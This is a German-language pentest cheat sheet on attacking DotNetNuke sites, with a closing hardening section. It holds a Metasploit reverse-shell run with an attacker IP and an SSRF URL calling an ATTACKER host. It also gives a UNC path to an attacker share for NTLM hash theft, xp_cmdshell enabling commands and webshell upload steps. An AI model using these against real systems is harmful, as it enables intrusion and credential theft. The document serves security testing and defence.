DotNetNuke (DNN)

Reading time: 5 minutes

DotNetNuke (DNN)

Wenn Sie sich als Administrator in DNN anmelden, ist es einfach, RCE zu erhalten. In den letzten Jahren wurden jedoch eine Reihe von unauthentifizierten und post-auth Techniken veröffentlicht. Das folgende Cheat-Sheet sammelt die nützlichsten Primitiven für sowohl offensive als auch defensive Arbeiten.

Versions- & Umgebungsenumeration

• Überprüfen Sie den X-DNN HTTP-Antwortheader – er gibt normalerweise die genaue Plattformversion an.
• Der Installationsassistent gibt die Version in /Install/Install.aspx?mode=install preis (zugänglich bei sehr alten Installationen).
• /API/PersonaBar/GetStatus (9.x) gibt ein JSON-Blob zurück, das "dnnVersion" für Benutzer mit niedrigen Berechtigungen enthält.
• Typische Cookies, die Sie in einer Live-Instanz sehen werden:
• .DOTNETNUKE – ASP.NET-Formularauthentifizierungsticket.
• DNNPersonalization – enthält XML/serialisierte Benutzerdaten (alte Versionen – siehe RCE unten).

Unauthentifizierte Ausnutzung

1. Cookie-Deserialisierung RCE (CVE-2017-9822 & Folgemaßnahmen)

Betroffene Versionen ≤ 9.3.0-RC

DNNPersonalization wird bei jeder Anfrage deserialisiert, wenn der integrierte 404-Handler aktiviert ist. Durch manipuliertes XML kann daher zu beliebigen Gadget-Ketten und Codeausführung führen.

msf> use exploit/windows/http/dnn_cookie_deserialization_rce
msf> set RHOSTS <target>
msf> set LHOST  <attacker_ip>
msf> run

Das Modul wählt automatisch den richtigen Pfad für gepatchte, aber weiterhin anfällige Versionen (CVE-2018-15811/15812/18325/18326). Die Ausnutzung funktioniert ohne Authentifizierung bei 7.x–9.1.x und mit einem verifizierten Konto mit niedrigen Rechten bei 9.2.x+.

2. Server-Side Request Forgery (CVE-2025-32372)

Betroffene Versionen < 9.13.8 – Patch veröffentlicht April 2025

Ein Umgehen des älteren DnnImageHandler-Fixes ermöglicht es einem Angreifer, den Server zu zwingen, willkürliche GET-Anfragen auszugeben (semi-blind SSRF). Praktische Auswirkungen:

• Interner Port-Scan / Metadaten-Service-Entdeckung in Cloud-Bereitstellungen.
• Erreichen von Hosts, die sonst durch eine Firewall vom Internet getrennt sind.

Proof-of-Concept (ersetzen Sie TARGET & ATTACKER):

https://TARGET/API/RemoteContentProxy?url=http://ATTACKER:8080/poc

Die Anfrage wird im Hintergrund ausgelöst; überwachen Sie Ihren Listener auf Rückrufe.

3. NTLM-Hash-Exposition über UNC-Umleitung (CVE-2025-52488)

Betroffene Versionen 6.0.0 – 9.x (< 10.0.1)

Spezial angefertigte Inhalte können DNN dazu bringen, eine Ressource über einen UNC-Pfad wie \\attacker\share\img.png abzurufen. Windows führt bereitwillig die NTLM-Verhandlung durch und leakt die Serverkonto-Hashes an den Angreifer. Aktualisieren Sie auf 10.0.1 oder deaktivieren Sie ausgehendes SMB an der Firewall.

4. IP-Filter-Umgehung (CVE-2025-52487)

Wenn Administratoren auf Host/IP-Filter zum Schutz des Admin-Portals angewiesen sind, beachten Sie, dass Versionen vor 10.0.1 durch Manipulation von X-Forwarded-For in einem Reverse-Proxy-Szenario umgangen werden können.

Post-Authentifizierung zu RCE

Über SQL-Konsole

Unter Einstellungen → SQL ermöglicht ein integriertes Abfragefenster die Ausführung gegen die Site-Datenbank. Auf Microsoft SQL Server können Sie xp_cmdshell aktivieren und Befehle ausführen:

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
GO
xp_cmdshell 'whoami';

Über ASPX-Webshell-Upload

1. Gehe zu Einstellungen → Sicherheit → Mehr → Weitere Sicherheitseinstellungen.
2. Füge aspx (oder asp) zu Erlaubte Dateierweiterungen hinzu und speichere.
3. Gehe zu /admin/file-management und lade shell.aspx hoch.
4. Rufe es auf unter /Portals/0/shell.aspx.

Privilegieneskalation unter Windows

Sobald die Codeausführung als IIS AppPool<Site> erreicht ist, gelten gängige Windows-Privilegieneskalationstechniken. Wenn die Box anfällig ist, kannst du Folgendes nutzen:

• PrintSpoofer / SpoolFool, um SeImpersonatePrivilege auszunutzen.
• Juicy/Sharp Potatoes, um Service Accounts zu umgehen.

Empfehlungen zur Härtung (Blue Team)

• Upgrade auf mindestens 9.13.9 (behebt SSRF-Umgehung) oder vorzugsweise 10.0.1 (IP-Filter- & NTLM-Probleme).
• Entferne verbleibende InstallWizard.aspx*-Dateien nach der Installation.
• Deaktiviere ausgehenden SMB (Ports 445/139) Egress.
• Erzwinge starke Host-Filter am Edge-Proxy anstelle innerhalb von DNN.
• Blockiere den Zugriff auf /API/RemoteContentProxy, wenn nicht verwendet.

Referenzen

• Metasploit dnn_cookie_deserialization_rce Modul-Dokumentation – praktische Details zur nicht authentifizierten RCE (GitHub).
• GitHub-Sicherheitsberatung GHSA-3f7v-qx94-666m – Informationen zur SSRF-Umgehung & Patch-Informationen von 2025.